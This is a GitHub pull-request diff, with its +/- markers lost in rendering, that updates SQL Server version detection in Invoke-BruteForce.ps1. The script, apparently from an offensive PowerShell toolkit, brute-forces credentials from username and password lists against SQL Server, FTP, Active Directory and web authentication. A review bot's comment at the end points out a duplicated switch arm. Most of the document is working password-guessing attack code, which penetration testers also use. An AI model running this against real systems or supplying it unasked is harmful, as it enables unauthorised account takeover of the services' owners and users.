Update SQL Server version numbers #25

Merged
merged 1 commit into from
Oct 7, 2015
57 changes: 29 additions & 28 deletions Scan/Invoke-BruteForce.ps1
@@ -1,5 +1,5 @@

function Invoke-BruteForce
function Invoke-BruteForce
{
<#
.SYNOPSIS
Expand Down Expand Up @@ -67,7 +67,7 @@ Goude 2012, TreuSec
$StopOnSuccess
)

Process
Process
{
$usernames = Get-Content $UserList
$passwords = Get-Content $PasswordList
Expand All @@ -84,26 +84,27 @@ Goude 2012, TreuSec
{
$success = $false
}
if($success -eq $true)
if($success -eq $true)
{
Write-Output "Match found! $username : $Password"
switch ($connection.ServerVersion) {
{ $_ -match "^6" } { "SQL Server 6.5";Break UsernameLoop }
{ $_ -match "^6" } { "SQL Server 7";Break UsernameLoop }
{ $_ -match "^7" } { "SQL Server 7";Break UsernameLoop }
{ $_ -match "^8" } { "SQL Server 2000";Break UsernameLoop }
{ $_ -match "^9" } { "SQL Server 2005";Break UsernameLoop }
{ $_ -match "^10\.00" } { "SQL Server 2008";Break UsernameLoop }
{ $_ -match "^10\.50" } { "SQL Server 2008 R2";Break UsernameLoop }
{ $_ -match "^11" } { "SQL Server 2012";Break UsernameLoop }
{ $_ -match "^12" } { "SQL Server 2014";Break UsernameLoop }
{ $_ -match "^13" } { "SQL Server 2016";Break UsernameLoop }
Default { "Unknown" }
}
}
}
}
if($service -eq "SQL")
if($service -eq "SQL")
{
Write-Output "Brute Forcing SQL Service on $ComputerName"
if($userList)
if($userList)
{
:UsernameLoop foreach ($username in $usernames)
{
Expand All @@ -114,24 +115,24 @@ Goude 2012, TreuSec
CheckForSQLSuccess
}
}
}
else
}
else
{
#If no username is provided, use trusted connection
$Connection.ConnectionString = "server=$identity;Initial Catalog=Master;trusted_connection=true;"
CheckForSQLSuccess

}
}
}

#Brute Force FTP
elseif ($service -eq "FTP")
{
if($ComputerName -notMatch "^ftp://")
if($ComputerName -notMatch "^ftp://")
{
$source = "ftp://" + $ComputerName
}
else
else
{
$source = $ComputerName
}
Expand All @@ -141,7 +142,7 @@ Goude 2012, TreuSec
{
foreach ($Password in $Passwords)
{
try
try
{
$ftpRequest = [System.Net.FtpWebRequest]::Create($source)
$ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::ListDirectoryDetails
Expand All @@ -157,52 +158,52 @@ Goude 2012, TreuSec
}
}

catch
catch
{
$message = $error[0].ToString()
$success = $false
}
}
}
}
}

#Brute Force Active Directory
elseif ($service -eq "ActiveDirectory")
elseif ($service -eq "ActiveDirectory")
{
Write-Output "Brute Forcing Active Directory $ComputerName"
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain
Try
Try
{
$principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, $ComputerName)
$success = $true
}
Catch
Catch
{
$message = "Unable to contact Domain"
$success = $false
}
if($success -ne $false)
if($success -ne $false)
{
:UsernameLoop foreach ($username in $usernames)
{
foreach ($Password in $Passwords)
{
Try
Try
{
Write-Verbose "Checking $userName : $password"
$success = $principalContext.ValidateCredentials($username, $password)
$message = "Password Match"
if ($success -eq $true)
{
Write-Output "Match found! $username : $Password"
Write-Output "Match found! $username : $Password"
if ($StopOnSuccess)
{
break UsernameLoop
}
}
}
Catch
Catch
{
$success = $false
$message = "Password doesn't match"
Expand All @@ -212,13 +213,13 @@ Goude 2012, TreuSec
}
}
#Brute Force Web
elseif ($service -eq "Web")
elseif ($service -eq "Web")
{
if ($ComputerName -notMatch "^(http|https)://")
{
$source = "http://" + $ComputerName
}
else
}
else
{
$source = $ComputerName
}
Expand All @@ -230,7 +231,7 @@ Goude 2012, TreuSec
$securePassword = ConvertTo-SecureString -AsPlainText -String $password -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $userName, $securePassword
$webClient.Credentials = $credential
Try
Try
{
Write-Verbose "Checking $userName : $password"
$source
Expand All @@ -239,14 +240,14 @@ Goude 2012, TreuSec
$success
if ($success -eq $true)
{
Write-Output "Match found! $Username : $Password"
Write-Output "Match found! $Username : $Password"
if ($StopOnSuccess)
{
break UsernameLoop
}
}
}
Catch
Catch
{
$success = $false
$message = "Password doesn't match"
Expand Down
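Review bot: In the `@@ -84,26 +84,27 @@` hunk the `switch ($connection.ServerVersion)` has two arms that both match `"^6"` — one labelled "SQL Server 6.5", the next labelled "SQL Server 7" — and since the first matching arm already executes `Break UsernameLoop`, the second `^6` arm is unreachable; the `^7` arm that follows it already covers 7.x, so the line `{ $_ -match "^6" } { "SQL Server 7";Break UsernameLoop }` looks like a leftover from the renumbering and should be dropped. The rendered view lost the +/- markers, so whether that duplicate is on the old or new side is inferred rather than certain. Separately, every arm exits the username loop unconditionally, whereas the ActiveDirectory and Web branches later in this file only run `break UsernameLoop` inside `if ($StopOnSuccess)`; it is worth confirming whether the SQL path is meant to ignore `$StopOnSuccess`, and a short comment above the switch stating the intended behaviour either way would help. The function that contains this switch (the `CheckForSQLSuccess` helper called at the `CheckForSQLSuccess` lines) starts above the hunk, so its signature is not visible here.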